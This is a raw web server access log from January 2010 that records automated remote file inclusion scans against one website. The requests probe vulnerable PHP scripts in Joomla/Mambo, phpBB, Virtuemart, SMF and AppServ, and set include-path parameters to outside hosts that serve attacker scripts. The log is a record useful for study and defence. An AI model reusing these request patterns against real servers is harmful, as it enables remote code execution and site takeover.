202.131.226.52 - - [25/Jan/2010:01:50:10 -0800] "GET /logs/access.log//?_zb_path=http://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:01:50:10 -0800] "GET /?_zb_path=http://dancook.fileave.com/id.txt???? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:01:50:10 -0800] "GET /logs//?_zb_path=http://dancook.fileave.com/id.txt???? HTTP/1.1" 200 4804 "-" "libwww-perl/5.805" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:01:52:44 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:01:52:44 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:01:52:44 -0800] "GET /logs/access_090720.log//admin.a6mambocredits.php?mosConfig_live_site=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:01:53:16 -0800] "GET /logs/access_090720.log//admin.a6mambocredits.php?mosConfig_live_site=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:01:53:16 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:01:53:16 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.251.139.66 - - [25/Jan/2010:01:53:17 -0800] "GET /logs/access_090727.log//bbs//twindow_notice.php?board_skin_path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
125.251.139.66 - - [25/Jan/2010:01:53:17 -0800] "GET /bbs//twindow_notice.php?board_skin_path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
125.251.139.66 - - [25/Jan/2010:01:53:18 -0800] "GET /logs//bbs//twindow_notice.php?board_skin_path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:01:53:34 -0800] "GET /logs/arcade.php/arcade.php?phpbb_root_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:01:53:34 -0800] "GET /logs/access.log/arcade.php/arcade.php?phpbb_root_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:01:53:35 -0800] "GET /arcade.php/arcade.php?phpbb_root_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:01:54:33 -0800] "GET /logs/access_091228.log%20%20/send_reminders.php?includedir=http://www.teamazot.fr//modules/AllMyGuests/Id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:01:54:33 -0800] "GET /logs/send_reminders.php?includedir=http://www.teamazot.fr//modules/AllMyGuests/Id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:01:54:33 -0800] "GET /send_reminders.php?includedir=http://www.teamazot.fr//modules/AllMyGuests/Id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:55:14 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:55:14 -0800] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:55:15 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:01:55:59 -0800] "GET /logs/access_091109.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:01:56:44 -0800] "GET /logs/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.176.79 - - [25/Jan/2010:01:56:44 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.176.79 - - [25/Jan/2010:01:56:44 -0800] "GET /logs/access.log%20%20/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.176.79 - - [25/Jan/2010:01:56:44 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:01:56:44 -0800] "GET /logs/access_100111.log%20%20/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:01:56:44 -0800] "GET /logs/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:58:56 -0800] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:58:56 -0800] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:59:08 -0800] "GET /logs/access_090720.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:59:08 -0800] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:59:08 -0800] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:59:08 -0800] "GET /logs/access_090720.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:59:12 -0800] "GET /logs/access_090720.log/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:59:12 -0800] "GET /?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:01:59:12 -0800] "GET /logs/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:02:00:17 -0800] "GET /logs/access_100104.log%20%20/send_reminders.php?includedir=http://www.teamazot.fr//modules/AllMyGuests/Id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:01:05 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:01:09 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:01:13 -0800] "GET /logs/access_090921.log%20%20/?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [25/Jan/2010:02:03:28 -0800] "GET /logs/access_090720.log/send_reminders.php?includedir=http://www.teamazot.fr//modules/AllMyGuests/Id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.55.181 - - [25/Jan/2010:02:08:26 -0800] "GET /logs/access_090720.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.raygina.de/cms//components/com_user/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.55.181 - - [25/Jan/2010:02:08:26 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.raygina.de/cms//components/com_user/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.55.181 - - [25/Jan/2010:02:08:26 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.raygina.de/cms//components/com_user/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.98.4.114 - - [25/Jan/2010:02:08:51 -0800] "GET /logs/access_090727.log//bbs//twindow_notice.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
65.98.4.114 - - [25/Jan/2010:02:08:51 -0800] "GET /bbs//twindow_notice.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
65.98.4.114 - - [25/Jan/2010:02:08:51 -0800] "GET /logs//bbs//twindow_notice.php?board_skin_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
218.38.55.181 - - [25/Jan/2010:02:09:08 -0800] "GET /admin.a6mambocredits.php?mosConfig_live_site=http://www.raygina.de/cms//components/com_user/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.55.181 - - [25/Jan/2010:02:09:08 -0800] "GET /logs/access_090720.log//admin.a6mambocredits.php?mosConfig_live_site=http://www.raygina.de/cms//components/com_user/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.55.181 - - [25/Jan/2010:02:09:08 -0800] "GET /logs//admin.a6mambocredits.php?mosConfig_live_site=http://www.raygina.de/cms//components/com_user/fxd? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:10:09 -0800] "GET /logs/access_091102.log//SSI.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:10:09 -0800] "GET /SSI.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:10:09 -0800] "GET /logs//SSI.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:10:10 -0800] "GET /SSI.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:10:10 -0800] "GET /logs/access_091102.log//SSI.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:10:10 -0800] "GET /logs//SSI.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:10:10 -0800] "GET /SSI.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:10:10 -0800] "GET /logs/access_091102.log//SSI.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:10:10 -0800] "GET /logs//SSI.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.35.219.220 - - [25/Jan/2010:02:10:16 -0800] "GET /logs/access.log//appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.35.219.220 - - [25/Jan/2010:02:10:16 -0800] "GET /appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.35.219.220 - - [25/Jan/2010:02:10:16 -0800] "GET /logs//appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.228.45.47 - - [25/Jan/2010:02:11:27 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:11:28 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:11:28 -0800] "GET /logs/access_091005.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:11:32 -0800] "GET /logs/access_091102.log%20%20//SSI.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:11:33 -0800] "GET /logs/access_091102.log%20%20//SSI.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:11:35 -0800] "GET /logs/access_091102.log%20%20//SSI.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:11:41 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:11:41 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:11:41 -0800] "GET /logs/access_091005.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:11:54 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:11:54 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:11:54 -0800] "GET /logs/access_091005.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:12:45 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:12:45 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:12:45 -0800] "GET /logs/access_091221.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:12:46 -0800] "GET /logs/access_100111.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.98.4.114 - - [25/Jan/2010:02:12:59 -0800] "GET /logs/access.log//appserv/main.php?appserv_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
65.98.4.114 - - [25/Jan/2010:02:12:59 -0800] "GET /appserv/main.php?appserv_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
65.98.4.114 - - [25/Jan/2010:02:12:59 -0800] "GET /logs//appserv/main.php?appserv_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:13:15 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:13:15 -0800] "GET /logs/access_091221.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:13:15 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:13:15 -0800] "GET /logs/access_100111.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:13:17 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:13:17 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [25/Jan/2010:02:13:17 -0800] "GET /logs/access_091005.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.usher.co.kr/data/id/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.98.4.114 - - [25/Jan/2010:02:15:29 -0800] "GET /logs/access_090706.log//appserv/main.php?appserv_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:16:56 -0800] "GET /logs/access_090921.log//SSI.php?sourcedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.175.213.166 - - [25/Jan/2010:02:20:13 -0800] "GET /logs/access.log//appserv/mani.php?appserv_root=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.175.213.166 - - [25/Jan/2010:02:20:13 -0800] "GET /logs//appserv/mani.php?appserv_root=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.175.213.166 - - [25/Jan/2010:02:20:13 -0800] "GET /appserv/mani.php?appserv_root=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.175.213.166 - - [25/Jan/2010:02:20:28 -0800] "GET /appserv/mani.php?appserv_root=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.175.213.166 - - [25/Jan/2010:02:20:28 -0800] "GET /logs/access.log//appserv/mani.php?appserv_root=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.175.213.166 - - [25/Jan/2010:02:20:28 -0800] "GET /logs//appserv/mani.php?appserv_root=http://spanorama.org/installation12/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
87.98.222.207 - - [25/Jan/2010:02:21:03 -0800] "GET /common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:21:03 -0800] "GET /logs/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:21:03 -0800] "GET /logs/access_090921.log%20%20/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:21:13 -0800] "GET /common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:21:13 -0800] "GET /logs/access_090921.log%20%20/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:21:13 -0800] "GET /logs/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:21:13 -0800] "GET /logs/access_090921.log%20%20/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:21:13 -0800] "GET /logs/common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.98.222.207 - - [25/Jan/2010:02:21:13 -0800] "GET /common/db.php?commonpath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.205.214.19 - - [25/Jan/2010:02:24:06 -0800] "GET /logs/access.log///include/footer.php?skin_board_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
119.205.214.19 - - [25/Jan/2010:02:24:07 -0800] "GET /logs///include/footer.php?skin_board_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
119.205.214.19 - - [25/Jan/2010:02:24:07 -0800] "GET //include/footer.php?skin_board_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.35.219.220 - - [25/Jan/2010:02:25:44 -0800] "GET /appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.35.219.220 - - [25/Jan/2010:02:25:44 -0800] "GET /logs//appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
89.35.219.220 - - [25/Jan/2010:02:26:27 -0800] "GET /logs/access.log//appserv/mani.php?appserv_root=http://filtry.in.ua//components/com_mailto/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.236.43.200 - - [25/Jan/2010:02:27:08 -0800] "GET /logs/access_090713.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://nktech.kr/bbs/data/id2.txt%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
211.236.43.200 - - [25/Jan/2010:02:27:09 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://nktech.kr/bbs/data/id2.txt%0D?? HTTP/1.1" 200 4804 "-" "libwww-perl/5.805" "www.galf.org"
211.236.43.200 - - [25/Jan/2010:02:27:09 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://nktech.kr/bbs/data/id2.txt%0D?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
202.131.226.52 - - [25/Jan/2010:02:27:58 -0800] "GET /logs/access.log//bbs/delete_all.phphttp://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
202.131.226.52 - - [25/Jan/2010:02:27:58 -0800] "GET /bbs/delete_all.phphttp://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
202.131.226.52 - - [25/Jan/2010:02:27:58 -0800] "GET /logs//bbs/delete_all.phphttp://dancook.fileave.com/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
